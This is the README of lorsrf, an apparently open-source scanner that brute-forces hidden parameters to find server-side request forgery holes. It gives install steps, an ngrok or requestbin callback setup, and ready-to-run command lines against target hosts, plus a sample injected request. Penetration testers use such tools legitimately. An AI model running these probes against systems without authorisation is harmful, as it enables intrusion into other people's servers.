Brute-forcing hidden parameters to find SSRF vulnerabilities using GET and POST methods
NOTE

Install:
➜ git clone https://github.com/knassar702/lorsrf
➜ cd lorsrf
➜ sudo pip3 install requests flask

Steps:
- Ngrok: expose the local callback listener, e.g. ./ngrok http 9090
- server.py: start the callback script on the same port you gave ngrok: python3 server.py 9090
- lorsrf.py: pass the ngrok host as the callback with the -s option
- Alternatively, pass a requestbin.com URL with the -s option (no server.py needed)

How can I use it?
cat YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w wordlist.txt
Examples:
$ cat parameters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io
$ cat parameters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --threads=50
$ cat parameters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --timeout=4
$ cat parameters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c 'user=5&PHPSESSION=5232'
$ cat headers.txt
Cookie: test=1
Auth: Basic TG9yU3JmCg==
$ cat parameters.txt | python3 lorsrf.py -f headers.txt -s 'http://myhost.com' -t 'http://ssrf.hack.com'
---------------------
GET /?parameter={YOUR_HOST} HTTP/1.1
Host: target.com
Cookie: test=1
Auth: Basic TG9yU3JmCg==
$ cat parameters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -r
Testing
python3 lorsrf.py -t 'http://testphp.vulnweb.com/showimage.php' -s 'https://YOUR_HOST.com' -w parameters.txt